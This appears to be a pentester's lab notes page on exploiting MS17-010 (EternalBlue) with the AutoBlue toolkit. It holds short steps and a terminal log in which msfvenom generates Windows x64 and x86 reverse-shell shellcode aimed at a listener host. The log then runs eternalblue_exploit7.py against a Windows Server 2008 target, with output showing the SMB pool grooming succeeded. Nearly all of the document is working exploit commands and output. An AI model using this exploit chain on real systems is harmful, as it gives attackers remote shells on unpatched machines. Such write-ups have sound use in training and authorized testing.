MS17-10 Eternal Blue
Exploitation:
Determine Arch and Version with RPC and the checker.py
Generate shellcode.
Run the exploit with the generated shellcode, however this is your choice, you could listen on netcat or multi handler.
Last updated
Exploitation:
Determine Arch and Version with RPC and the checker.py
Generate shellcode.
Run the exploit with the generated shellcode, however this is your choice, you could listen on netcat or multi handler.
Last updated
ββξ² ο
Ό ξ± ο /home/k/I/r/192.168.100.40/exploit/AutoBlue-MS17-010/shellcode ξ± ο ο¦ master ?1 ββββββββ β ξ³ root@kali ξ°
β°β ./shell_prep.sh
_.-;;-._
'-..-'| || |
'-..-'|_.-;;-._|
'-..-'| || |
'-..-'|_.-''-._|
Eternal Blue Windows Shellcode Compiler
Let's compile them windoos shellcodezzz
Compiling x64 kernel shellcode
Compiling x86 kernel shellcode
kernel shellcode compiled, would you like to auto generate a reverse shell with msfvenom? (Y/n)
y
LHOST for reverse connection:
192.168.49.227
LPORT you want x64 to listen on:
80
LPORT you want x86 to listen on:
80
Type 0 to generate a meterpreter shell or 1 to generate a regular cmd shell
1
Type 0 to generate a staged payload or 1 to generate a stageless payload
1
Generating x64 cmd shell (stageless)...
msfvenom -p windows/x64/shell_reverse_tcp -f raw -o sc_x64_msf.bin EXITFUNC=thread LHOST=192.168.49.227 LPORT=80
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Saved as: sc_x64_msf.bin
Generating x86 cmd shell (stageless)...
msfvenom -p windows/shell_reverse_tcp -f raw -o sc_x86_msf.bin EXITFUNC=thread LHOST=192.168.49.227 LPORT=80
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Saved as: sc_x86_msf.bin
MERGING SHELLCODE WOOOO!!!
DONEpython3 eternalblue_exploit7.py 192.168.227.40 shellcode/sc_x86.bin
shellcode size: 962
numGroomConn: 13
Target OS: Windows Server (R) 2008 Standard 6001 Service Pack 1
SMB1 session setup allocate nonpaged pool success
SMB1 session setup allocate nonpaged pool success
good response status: INVALID_PARAMETER
done